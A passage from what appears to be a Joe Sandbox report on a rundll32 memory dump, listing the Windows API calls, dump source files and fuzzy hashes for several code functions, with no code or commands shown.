                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                              • String ID:
                                                                              • API String ID: 1994056952-0
                                                                              • Opcode ID: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction ID: 7318a5178291d0556e60b218945a0bffadc43096bb0da8ede69c5c198df7fcff
                                                                              • Opcode Fuzzy Hash: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction Fuzzy Hash: 08214C7620460AAFA760FA59CD80F6B73DDEF04364B54582CFE5AC7642EB20FC018B60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663633fca52b7758c0e2f8c739663ce86faaa63be569a9c2d7ff3f920377b970
                                                                              • Instruction ID: 3a1debde462cf0e4123f74f69e71743842fe76e919de05f55f5617dbde56256a
                                                                              • Opcode Fuzzy Hash: 663633fca52b7758c0e2f8c739663ce86faaa63be569a9c2d7ff3f920377b970
                                                                              • Instruction Fuzzy Hash: 1CC1557A710A005BE7149ABE9CC477EB7C79BC4329F58827EE214CB396DB65E805C350
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 041E8E38: GetCurrentThreadId.KERNEL32 ref: 041E8E3B
                                                                              • GetTickCount.KERNEL32 ref: 041E89E3
                                                                              • GetTickCount.KERNEL32 ref: 041E89FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E8A2A
                                                                              • GetTickCount.KERNEL32 ref: 041E8A55
                                                                              • GetTickCount.KERNEL32 ref: 041E8A8C
                                                                              • GetTickCount.KERNEL32 ref: 041E8AB6
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E8B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 3968769311-0
                                                                              • Opcode ID: 98a96b6e3da6aa6528430e064ef2c5ae775bd39c9fd07b5bba259f8589f03d52
                                                                              • Instruction ID: 15c877badf48eb0fdc077ec38e1ec631550650271c93be2c7ccdda320d952541
                                                                              • Opcode Fuzzy Hash: 98a96b6e3da6aa6528430e064ef2c5ae775bd39c9fd07b5bba259f8589f03d52
                                                                              • Instruction Fuzzy Hash: 64417275208B419EE721BFBEC5C433FBBD1AF84358F05896CD4D887281EB75A4849752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C,04413B9C,?,?,04408C38,041F0843,04407788), ref: 041E9A65
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C,04413B9C,?,?,04408C38,041F0843), ref: 041E9A6B
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04407788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C), ref: 041E9A86
                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04407788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?), ref: 041E9A8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 3320372497-2970929446
                                                                              • Opcode ID: 409199b91664dc120d3b4ca2c155bfbedc2929dd719e8aa894d3c4437cfe794f
                                                                              • Instruction ID: 96680ba954d5bd0db76b844a0edc020c4a558896e1eb32b186c2b256ba91c522
                                                                              • Opcode Fuzzy Hash: 409199b91664dc120d3b4ca2c155bfbedc2929dd719e8aa894d3c4437cfe794f
                                                                              • Instruction Fuzzy Hash: 93F046F8690B447AFB20B7D18D82F3C262C9F84B19F204115F328684C4CBB878C4A722
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 041E6252
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 041E6258
                                                                              • GetStdHandle.KERNEL32(000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 041E6277
                                                                              • WriteFile.KERNEL32(00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 041E627D
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 041E6294
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 041E629A
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 3320372497-0
                                                                              • Opcode ID: 11329ec6cbb160edb0ccf7d558fd021fc990d2e5196707820741d7660f748734
                                                                              • Instruction ID: 397addd4100029ea682ffdc6447a9e4d706aa8aaf7015bec152d0d4bf080b93c
                                                                              • Opcode Fuzzy Hash: 11329ec6cbb160edb0ccf7d558fd021fc990d2e5196707820741d7660f748734
                                                                              • Instruction Fuzzy Hash: 2701AFA9A08F117DF610F6EA9EC4F7B378D8F4966CF510610B118E60C2CB68AC4487B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 041E5A1F
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 041E5A35
                                                                              • Sleep.KERNEL32(00000000), ref: 041E5A63
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 041E5A79
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: a2c4b061acfef69824bf2ca9909e576c34831284bf521f79fb3506d4617604fc
                                                                              • Instruction ID: bcddd9b2fc784ffb0ea59162ab357ef2669a6c2f30de81079b503408ee0d61dc
                                                                              • Opcode Fuzzy Hash: a2c4b061acfef69824bf2ca9909e576c34831284bf521f79fb3506d4617604fc
                                                                              • Instruction Fuzzy Hash: B4C15A7A601B129FE715CFAAD4C0779BFE2EB89318F0882AED5158B395D374A841C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(043C6848,00000000), ref: 043C6992
                                                                              • ShowWindow.USER32(?,00000000,043C6848,00000000), ref: 043C69D4
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 043C6A03
                                                                              • ShowWindow.USER32(?,00000005), ref: 043C6A78
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 043C6AA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                              • String ID:
                                                                              • API String ID: 315437064-0
                                                                              • Opcode ID: b55690c11f7e9ac06e459378f403b8d89b13a31d52b195192802acf0999c0d35
                                                                              • Instruction ID: 82161eeb3f56e4bcfd92fcdb9c687d85ead0c6c2d15f9a2fb6b05825dd4fc0f1
                                                                              • Opcode Fuzzy Hash: b55690c11f7e9ac06e459378f403b8d89b13a31d52b195192802acf0999c0d35
                                                                              • Instruction Fuzzy Hash: AC418D74600B009FE720DB28C885BAA73D6FB84328F15692DE55AC72E1D734FC91DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 043C5A5A
                                                                              • SetEvent.KERNEL32(00000000), ref: 043C5A86
                                                                              • GetCurrentThreadId.KERNEL32 ref: 043C5A8B
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 043C5AB4
                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 043C5AC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                              • String ID:
                                                                              • API String ID: 2132507429-0
                                                                              • Opcode ID: 3a45470aa303fb48be5cf49a96ea087f96ab6a3649595f35b6941671fdaf1a06
                                                                              • Instruction ID: e5e42f28654631f5f680dfcf05a6265c1c736052384615d44efbc9ca0f2f9e8e
                                                                              • Opcode Fuzzy Hash: 3a45470aa303fb48be5cf49a96ea087f96ab6a3649595f35b6941671fdaf1a06
                                                                              • Instruction Fuzzy Hash: 63016D71246211AFF702EBA9CD80B1A33E5EB44325F40992AFA54C72E0DF38BC40CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 041ECBC9
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 041ECC27
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 041ECC84
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 041ECCB7
                                                                                • Part of subcall function 041ECB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,041ECC35), ref: 041ECB8B
                                                                                • Part of subcall function 041ECB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,041ECC35), ref: 041ECBA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                              • String ID:
                                                                              • API String ID: 2255706666-0
                                                                              • Opcode ID: 675a639b79097d32819f7bf83f74082a93306746a3f660b717cb00bb00c69994
                                                                              • Instruction ID: 782523f8f9ede8cf82dea6535005b9c0a06343cdfe40dae098cfd906914c2c37
                                                                              • Opcode Fuzzy Hash: 675a639b79097d32819f7bf83f74082a93306746a3f660b717cb00bb00c69994
                                                                              • Instruction Fuzzy Hash: DF314D75A0061E9BEB10DFEACCC4ABEB7B4EF04304F4441A5D911E7290EB74AA04CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,044171C0,043C813C), ref: 043C74C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID:
                                                                              • API String ID: 2558294473-0
                                                                              • Opcode ID: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction ID: 1cc2a796f54769413c7d1b6fa3b055c378c76cb69cd5d7caf600e56c8e52ba32
                                                                              • Opcode Fuzzy Hash: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction Fuzzy Hash: 2E31FD70600281ABEB55FE68CCC5B9A37965F04308F0464B8AD04DF69ACB75FC85CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindow.USER32(?,00000004), ref: 043C685A
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 043C6877
                                                                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 043C6883
                                                                              • IsWindowVisible.USER32(?), ref: 043C68DD
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Process$CurrentThreadVisible
                                                                              • String ID:
                                                                              • API String ID: 3926708836-0
                                                                              • Opcode ID: 7b4d0ac2088e21256a5a8f6e1d3168c23271167198629f0f4dd3ac4a15e86d16
                                                                              • Instruction ID: a52f82c75bb9154a50b4f98f8c374e94a439390175bd6d91bcf9fb48ccff573e
                                                                              • Opcode Fuzzy Hash: 7b4d0ac2088e21256a5a8f6e1d3168c23271167198629f0f4dd3ac4a15e86d16
                                                                              • Instruction Fuzzy Hash: 7B314A35600305ABEB10DFA9D8C1EAA77A9FB45314F0451B9EA1497392DB35FD018BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(043C6534), ref: 043C6625
                                                                              • GetWindow.USER32(00000003,00000003), ref: 043C663D
                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 043C664A
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 043C6689
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID:
                                                                              • API String ID: 4191631535-0
                                                                              • Opcode ID: b9f19153142e44b060006386fa1d10f91b0e9ae56ab5c49e1fcef00fe4636658
                                                                              • Instruction ID: 545230925acc46cbae6e90ce02885ace1e4a68972d37c177af12d44263a333c8
                                                                              • Opcode Fuzzy Hash: b9f19153142e44b060006386fa1d10f91b0e9ae56ab5c49e1fcef00fe4636658
                                                                              • Instruction Fuzzy Hash: 1C113071705710AFEB10AB188CC5F99B7D49F46728F155268FDA8AF2D2C770AC418B62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04311D11
                                                                              • GetCurrentProcessId.KERNEL32(?,?,00000000,043C9BD1,?,?,?,00000001,043C7DAB), ref: 04311D1A
                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04311D2F
                                                                              • GetPropW.USER32(00000000,00000000), ref: 04311D46
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
